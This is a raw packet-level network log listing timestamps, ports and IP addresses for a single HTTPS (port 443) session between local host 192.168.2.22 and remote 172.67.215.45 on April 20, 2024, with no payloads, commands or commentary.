Apr 20, 2024 11:36:04.028528929 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.028595924 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.028603077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.028631926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.028687954 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.030653954 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.030723095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.030733109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.030760050 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.030805111 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.032447100 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.032509089 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.032514095 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.032531023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.032572031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.034221888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.034287930 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.034290075 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.034315109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.034363031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.035976887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.036058903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.036058903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.036084890 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.036148071 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.037750959 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.037838936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.037851095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.037863016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.037959099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.039864063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.039879084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.039954901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.039954901 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.039980888 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.041676044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.041707993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.041727066 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.041743994 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.041800976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.041800976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.043438911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.043473005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.043510914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.043531895 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.043557882 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.045200109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.045233965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.045260906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.045274973 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.045305967 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.047769070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.047797918 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.047841072 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.047868967 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.047894001 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.049174070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.049210072 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.049246073 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.049264908 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.049305916 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.050966978 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.050998926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.051028967 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.051044941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.051071882 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.051091909 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.052720070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.052740097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.052825928 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.052825928 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.052846909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.060863018 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.060894012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.060933113 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.060955048 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.060981035 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.061074972 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.062604904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.062637091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.062671900 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.062690973 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.062716961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.062786102 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.064034939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.064065933 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.064136028 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.064156055 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.064181089 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.064258099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.066536903 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.066566944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.066603899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.066622972 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.066646099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.066646099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.068465948 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.068499088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.068535089 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.068552971 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.068578005 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.068598032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.118407965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.118503094 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.118647099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.118647099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.118716955 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.120138884 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.120212078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.120356083 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.120356083 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.120419979 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.122876883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.122941017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.122951031 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.122972012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.123013020 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.124468088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.124537945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.124540091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.124638081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.124670029 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.126410007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.126473904 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.126487970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.126518011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.126559019 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.126559019 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.127619982 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.127691984 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.127691984 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.127717018 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.127760887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.130249977 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.130312920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.130323887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.130345106 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.130384922 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.132033110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.132121086 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.132148027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.132162094 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.132191896 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.132193089 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.133759975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.133824110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.133830070 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.133847952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.133893013 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.136169910 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.136238098 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.136240005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.136266947 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.136317015 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.137123108 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.137190104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.137198925 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.137213945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.137243986 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.137262106 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.138227940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.138298988 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.138298988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.138324022 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.138379097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.139851093 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.139914989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.139920950 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.139944077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.139982939 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.142018080 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.142090082 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.142095089 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.142113924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.142158985 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.143867016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.143929005 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.143932104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.143959999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.144001961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.145577908 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.145659924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.145668030 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.145685911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.145730019 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.147386074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.147452116 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.147455931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.147475958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.147522926 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.149137020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.149205923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.149209023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.149233103 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.149282932 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.151308060 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.151371956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.151381016 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.151398897 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.151444912 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.153074026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.153152943 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.153160095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.153183937 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.153224945 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.154931068 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.154994011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.154997110 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.155019999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.155061007 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.156637907 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.156702995 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.156711102 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.156735897 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.156780005 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.158314943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.158379078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.158385992 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.158401966 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.158452988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.160491943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.160557032 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.160563946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.160581112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.160619974 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.162369967 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.162436962 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.162441015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.162465096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.162508965 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.164405107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.164469004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.164474964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.164495945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.164540052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.166136980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.166205883 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.166209936 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.166235924 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.166290045 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.167172909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.167237997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.167242050 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.167260885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.167295933 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.169020891 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169076920 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.169091940 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169095993 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.169120073 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169157982 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.169858932 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169923067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169930935 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.169950008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.169996023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.171717882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.171798944 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.171799898 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.171825886 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.171870947 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.173388958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.173455000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.173461914 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.173481941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.173517942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.173540115 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.174356937 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.174422026 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.174427032 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.174443960 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.174489021 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.176412106 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.176481962 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.176501989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.176537991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.176595926 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.176610947 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.177284002 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.177346945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.177351952 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.177377939 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.177414894 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.179043055 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.179111958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.179114103 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.179142952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.179183960 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.179919004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.179982901 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.179991961 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.180011034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.180058956 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.181610107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.181679964 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.181701899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.181716919 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.181763887 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.183303118 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.183372021 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.183376074 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.183397055 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.183430910 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.183450937 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.184564114 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.184629917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.184638023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.184653997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.184695005 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.185457945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.185528040 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.185528994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.185554981 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.185600996 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.187100887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.187163115 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.187191963 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.187206030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.187232971 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.188947916 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189018011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.189018965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189045906 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189089060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.189856052 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189918995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189920902 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.189943075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.189981937 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.190979004 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.191044092 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.191060066 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.191070080 CEST	443	49163	172.67.215.45	192.168.2.22
